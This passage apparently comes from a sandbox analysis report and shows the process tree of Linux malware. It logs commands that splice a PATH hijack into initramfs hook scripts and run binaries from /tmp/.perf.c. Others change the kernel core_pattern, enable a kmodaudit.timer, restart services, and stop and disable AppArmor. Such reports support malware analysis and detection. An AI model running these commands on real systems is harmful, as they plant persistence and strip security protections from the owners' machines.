                                                                                                                                          grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                          4⤵
                                                                                                                                            PID:2724
                                                                                                                                          • /usr/sbin/grep
                                                                                                                                            grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                            4⤵
                                                                                                                                              PID:2724
                                                                                                                                            • /usr/bin/grep
                                                                                                                                              grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                              4⤵
                                                                                                                                                PID:2724
                                                                                                                                            • /usr/bin/xargs
                                                                                                                                              xargs grep -L "export PATH=.*/\\.local/bin:.PATH"
                                                                                                                                              3⤵
                                                                                                                                                PID:2723
                                                                                                                                                • /tmp/.perf.c/grep
                                                                                                                                                  grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2727
                                                                                                                                                  • /tmp/grep
                                                                                                                                                    grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2727
                                                                                                                                                    • /usr/local/sbin/grep
                                                                                                                                                      grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2727
                                                                                                                                                      • /usr/local/bin/grep
                                                                                                                                                        grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2727
                                                                                                                                                        • /usr/sbin/grep
                                                                                                                                                          grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2727
                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                            grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2727
                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                            sed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/dhcpcd
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2728
                                                                                                                                                            • /usr/bin/sed
                                                                                                                                                              sed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                              3⤵
                                                                                                                                                                PID:2729
                                                                                                                                                            • /bin/sh
                                                                                                                                                              /bin/sh -c "systemctl --type=service --state=running|grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald|awk '{print \$1}'|xargs -I{} systemctl try-restart {} >/dev/null 2>/dev/null"
                                                                                                                                                              2⤵
                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                              PID:2731
                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                systemctl "--type=service" "--state=running"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2733
                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                  grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2734
                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                    awk "{print \$1}"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2735
                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                      xargs "-I{}" systemctl try-restart "{}"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2737
                                                                                                                                                                        • /tmp/.perf.c/systemctl
                                                                                                                                                                          systemctl try-restart cron.service
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2869
                                                                                                                                                                          • /tmp/systemctl
                                                                                                                                                                            systemctl try-restart cron.service
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2869
                                                                                                                                                                            • /usr/local/sbin/systemctl
                                                                                                                                                                              systemctl try-restart cron.service
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2869
                                                                                                                                                                              • /usr/local/bin/systemctl
                                                                                                                                                                                systemctl try-restart cron.service
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2869
                                                                                                                                                                                • /usr/sbin/systemctl
                                                                                                                                                                                  systemctl try-restart cron.service
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2869
                                                                                                                                                                                  • /usr/bin/systemctl
                                                                                                                                                                                    systemctl try-restart cron.service
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2869
                                                                                                                                                                                    • /tmp/.perf.c/systemctl
                                                                                                                                                                                      systemctl try-restart systemd-journald.service
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3246
                                                                                                                                                                                      • /tmp/systemctl
                                                                                                                                                                                        systemctl try-restart systemd-journald.service
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3246
                                                                                                                                                                                        • /usr/local/sbin/systemctl
                                                                                                                                                                                          systemctl try-restart systemd-journald.service
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3246
                                                                                                                                                                                          • /usr/local/bin/systemctl
                                                                                                                                                                                            systemctl try-restart systemd-journald.service
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:3246
                                                                                                                                                                                            • /usr/sbin/systemctl
                                                                                                                                                                                              systemctl try-restart systemd-journald.service
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3246
                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                systemctl try-restart systemd-journald.service
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3246
                                                                                                                                                                                                • /tmp/.perf.c/systemctl
                                                                                                                                                                                                  systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3258
                                                                                                                                                                                                  • /tmp/systemctl
                                                                                                                                                                                                    systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:3258
                                                                                                                                                                                                    • /usr/local/sbin/systemctl
                                                                                                                                                                                                      systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3258
                                                                                                                                                                                                      • /usr/local/bin/systemctl
                                                                                                                                                                                                        systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3258
                                                                                                                                                                                                        • /usr/sbin/systemctl
                                                                                                                                                                                                          systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:3258
                                                                                                                                                                                                          • /usr/bin/systemctl
                                                                                                                                                                                                            systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:3258
                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                          /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                          PID:2732
                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                          /bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                          PID:2736
                                                                                                                                                                                                          • /usr/bin/find
                                                                                                                                                                                                            find /usr/share/initramfs-tools/hooks -type f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2739
                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                              xargs grep -s -l "ldd "
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2740
                                                                                                                                                                                                                • /tmp/.perf.c/grep
                                                                                                                                                                                                                  grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2751
                                                                                                                                                                                                                  • /tmp/grep
                                                                                                                                                                                                                    grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:2751
                                                                                                                                                                                                                    • /usr/local/sbin/grep
                                                                                                                                                                                                                      grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:2751
                                                                                                                                                                                                                      • /usr/local/bin/grep
                                                                                                                                                                                                                        grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:2751
                                                                                                                                                                                                                        • /usr/sbin/grep
                                                                                                                                                                                                                          grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2751
                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                            grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:2751
                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                            xargs grep -L "export PATH=.*/\\.local/bin:.PATH"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2741
                                                                                                                                                                                                                              • /tmp/.perf.c/grep
                                                                                                                                                                                                                                grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2775
                                                                                                                                                                                                                                • /tmp/grep
                                                                                                                                                                                                                                  grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:2775
                                                                                                                                                                                                                                  • /usr/local/sbin/grep
                                                                                                                                                                                                                                    grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:2775
                                                                                                                                                                                                                                    • /usr/local/bin/grep
                                                                                                                                                                                                                                      grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:2775
                                                                                                                                                                                                                                      • /usr/sbin/grep
                                                                                                                                                                                                                                        grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:2775
                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                          grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:2775
                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                        /bin/sh -c "systemctl daemon-reload;systemctl enable kmodaudit.timer;systemctl start kmodaudit.timer"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                        PID:2787
                                                                                                                                                                                                                                        • /usr/bin/systemctl
                                                                                                                                                                                                                                          systemctl daemon-reload
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2791
                                                                                                                                                                                                                                          • /usr/bin/systemctl
                                                                                                                                                                                                                                            systemctl enable kmodaudit.timer
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2993
                                                                                                                                                                                                                                            • /usr/bin/systemctl
                                                                                                                                                                                                                                              systemctl start kmodaudit.timer
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3245
                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                              /bin/sh -c "if systemctl status apparmor|grep -q 'enabled;';then systemctl stop apparmor;systemctl disable apparmor;fi"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                              PID:3242
                                                                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                                                                systemctl status apparmor
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3243
                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                  grep -q "enabled;"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3244
                                                                                                                                                                                                                                                  • /usr/bin/systemctl
                                                                                                                                                                                                                                                    systemctl stop apparmor
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3250
                                                                                                                                                                                                                                                    • /usr/bin/systemctl
                                                                                                                                                                                                                                                      systemctl disable apparmor
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Changes its process name
                                                                                                                                                                                                                                                      PID:3253
                                                                                                                                                                                                                                                      • /usr/bin/getopt
                                                                                                                                                                                                                                                        getopt -o r: --long root: -- disable apparmor
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:3255
                                                                                                                                                                                                                                                        • /usr/sbin/update-rc.d
                                                                                                                                                                                                                                                          /usr/sbin/update-rc.d apparmor defaults
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:3257
                                                                                                                                                                                                                                                            • /tmp/.perf.c/systemctl
                                                                                                                                                                                                                                                              systemctl daemon-reload
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:3259
                                                                                                                                                                                                                                                              • /tmp/systemctl
                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:3259
                                                                                                                                                                                                                                                                • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                  systemctl daemon-reload
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:3259
                                                                                                                                                                                                                                                                  • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                    systemctl daemon-reload
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:3259
                                                                                                                                                                                                                                                                    • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                      systemctl daemon-reload
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:3259
                                                                                                                                                                                                                                                                      • /usr/bin/systemctl
                                                                                                                                                                                                                                                                        systemctl daemon-reload
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:3259
                                                                                                                                                                                                                                                                      • /usr/sbin/update-rc.d
                                                                                                                                                                                                                                                                        /usr/sbin/update-rc.d apparmor disable
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:3404
                                                                                                                                                                                                                                                                          • /tmp/.perf.c/systemctl
